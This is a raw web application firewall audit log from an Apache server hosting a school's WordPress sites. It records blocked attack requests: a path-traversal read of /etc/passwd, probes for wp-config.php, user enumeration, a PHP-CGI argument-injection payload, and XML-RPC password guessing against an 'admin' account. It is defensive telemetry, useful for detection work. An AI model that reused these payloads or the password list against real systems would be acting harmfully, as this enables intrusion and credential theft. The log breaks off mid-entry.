User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 --9f29623f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f29623f-E-- --9f29623f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054523283217 2003 (- - -) Stopwatch2: 1745054523283217 2003; combined=513, p1=379, p2=107, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f29623f-Z-- --133b997e-A-- [19/Apr/2025:16:48:37 +0700] aANxdevDiFC_ir7MDwb4AQAAAEY 103.236.140.4 52056 103.236.140.4 8181 --133b997e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.5 --133b997e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --133b997e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745056117946941 2400 (- - -) Stopwatch2: 1745056117946941 2400; combined=1174, p1=408, p2=738, p3=0, p4=0, p5=28, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --133b997e-Z-- --7f604d4a-A-- [19/Apr/2025:18:19:11 +0700] aAOGr3Na4dA2HllpK_PYGgAAAJc 103.236.140.4 54852 103.236.140.4 8181 --7f604d4a-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.52.74 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 188.166.52.74 Accept-Encoding: gzip X-Varnish: 129014527 --7f604d4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7f604d4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745061551571822 735 (- - -) Stopwatch2: 1745061551571822 735; combined=254, p1=225, p2=0, p3=0, p4=0, p5=29, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f604d4a-Z-- --c62a3236-A-- [19/Apr/2025:18:19:25 +0700] aAOGvevDiFC_ir7MDwY5ZQAAAEY 103.236.140.4 56328 103.236.140.4 8181 --c62a3236-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c62a3236-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c62a3236-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745061565763054 2195 (- - -) Stopwatch2: 1745061565763054 2195; combined=954, p1=354, p2=579, p3=0, p4=0, p5=21, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c62a3236-Z-- --747dc95c-A-- [19/Apr/2025:18:19:30 +0700] aAOGwg6cTFSgLAHl7PolmwAAAAA 103.236.140.4 56806 103.236.140.4 8181 --747dc95c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.74 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --747dc95c-C-- demo.sayHello --747dc95c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --747dc95c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745061570302892 5355 (- - -) Stopwatch2: 1745061570302892 5355; combined=4004, p1=509, p2=3280, p3=27, p4=30, p5=94, sr=65, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --747dc95c-Z-- --2e34d641-A-- [19/Apr/2025:18:35:51 +0700] aAOKlw6cTFSgLAHl7PpAZgAAAAQ 103.236.140.4 42948 103.236.140.4 8181 --2e34d641-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2e34d641-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e34d641-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745062551217453 2751 (- - -) Stopwatch2: 1745062551217453 2751; combined=1258, p1=445, p2=781, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e34d641-Z-- --1c828f03-A-- [19/Apr/2025:18:35:57 +0700] aAOKnXNa4dA2HllpK_PuxQAAAIY 103.236.140.4 43552 103.236.140.4 8181 --1c828f03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1c828f03-C-- demo.sayHello --1c828f03-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c828f03-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745062557030642 5715 (- - -) Stopwatch2: 1745062557030642 5715; combined=4263, p1=543, p2=3488, p3=32, p4=31, p5=97, sr=75, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c828f03-Z-- --9b2d8e4b-A-- [19/Apr/2025:18:42:13 +0700] aAOMFQ6cTFSgLAHl7PpKqgAAAAw 103.236.140.4 52618 103.236.140.4 8181 --9b2d8e4b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --9b2d8e4b-C-- --9b2d8e4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b2d8e4b-E-- --9b2d8e4b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745062933512660 4481 (- - -) Stopwatch2: 1745062933512660 4481; combined=3101, p1=536, p2=2531, p3=0, p4=0, p5=34, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b2d8e4b-Z-- --2eb4ce39-A-- [19/Apr/2025:19:06:07 +0700] aAORr3Na4dA2HllpK_MXVQAAAJc 103.236.140.4 49918 103.236.140.4 8181 --2eb4ce39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2eb4ce39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2eb4ce39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745064367321049 3585 (- - -) Stopwatch2: 1745064367321049 3585; combined=1827, p1=560, p2=1235, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2eb4ce39-Z-- --41b93b44-A-- [19/Apr/2025:19:06:14 +0700] aAORtkruoUXZj665VUGIwgAAAMw 103.236.140.4 50538 103.236.140.4 8181 --41b93b44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --41b93b44-C-- demo.sayHello --41b93b44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --41b93b44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745064374440766 5969 (- - -) Stopwatch2: 1745064374440766 5969; combined=4429, p1=621, p2=3550, p3=33, p4=62, p5=97, sr=69, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41b93b44-Z-- --921b6d25-A-- [19/Apr/2025:19:53:31 +0700] aAOcy-vDiFC_ir7MDwbIGwAAAEM 103.236.140.4 45416 103.236.140.4 8181 --921b6d25-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --921b6d25-C-- wp.getUsersBlogs admin 12345 --921b6d25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --921b6d25-E-- --921b6d25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067211736988 4695 (- - -) Stopwatch2: 1745067211736988 4695; combined=3081, p1=464, p2=2487, p3=0, p4=0, p5=77, sr=59, sw=53, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --921b6d25-Z-- --1c5f5d73-A-- [19/Apr/2025:19:54:32 +0700] aAOdCHNa4dA2HllpK_Ne8QAAAIQ 103.236.140.4 51012 103.236.140.4 8181 --1c5f5d73-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1c5f5d73-C-- wp.getUsersBlogs admin r007p455w0rd --1c5f5d73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c5f5d73-E-- --1c5f5d73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067272153177 4926 (- - -) Stopwatch2: 1745067272153177 4926; combined=3460, p1=446, p2=2855, p3=0, p4=0, p5=95, sr=85, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c5f5d73-Z-- --a7cc143f-A-- [19/Apr/2025:19:55:32 +0700] aAOdROvDiFC_ir7MDwbKjgAAAE0 103.236.140.4 56324 103.236.140.4 8181 --a7cc143f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a7cc143f-C-- wp.getUsersBlogs admin admin@2019 --a7cc143f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7cc143f-E-- --a7cc143f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067332912369 6825 (- - -) Stopwatch2: 1745067332912369 6825; combined=4978, p1=741, p2=4057, p3=0, p4=0, p5=108, sr=93, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7cc143f-Z-- --d866f646-A-- [19/Apr/2025:19:56:36 +0700] aAOdhEruoUXZj665VUHbAAAAAMI 103.236.140.4 33378 103.236.140.4 8181 --d866f646-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d866f646-C-- wp.getUsersBlogs admin 1234554321 --d866f646-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d866f646-E-- --d866f646-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067396557944 5056 (- - -) Stopwatch2: 1745067396557944 5056; combined=3709, p1=500, p2=3037, p3=0, p4=0, p5=102, sr=154, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d866f646-Z-- --ac38c556-A-- [19/Apr/2025:19:57:36 +0700] aAOdwHNa4dA2HllpK_NitgAAAIs 103.236.140.4 38696 103.236.140.4 8181 --ac38c556-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ac38c556-C-- wp.getUsersBlogs admin servmask --ac38c556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac38c556-E-- --ac38c556-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067456655014 5252 (- - -) Stopwatch2: 1745067456655014 5252; combined=4025, p1=476, p2=3360, p3=0, p4=0, p5=112, sr=106, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac38c556-Z-- --6344c962-A-- [19/Apr/2025:19:58:45 +0700] aAOeBevDiFC_ir7MDwbOuwAAAEs 103.236.140.4 45340 103.236.140.4 8181 --6344c962-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6344c962-C-- wp.getUsersBlogs admin asdasd123 --6344c962-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6344c962-E-- --6344c962-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745067525251726 6155 (- - -) Stopwatch2: 1745067525251726 6155; combined=4426, p1=614, p2=3560, p3=0, p4=0, p5=146, sr=159, sw=106, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6344c962-Z-- --8f196851-A-- [19/Apr/2025:19:59:47 +0700] aAOeQ3Na4dA2HllpK_NmSAAAAIY 103.236.140.4 51084 103.236.140.4 8181 --8f196851-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8f196851-C-- wp.getUsersBlogs admin admin1992 --8f196851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f196851-E-- --8f196851-H-- Message: Access denied with code 403 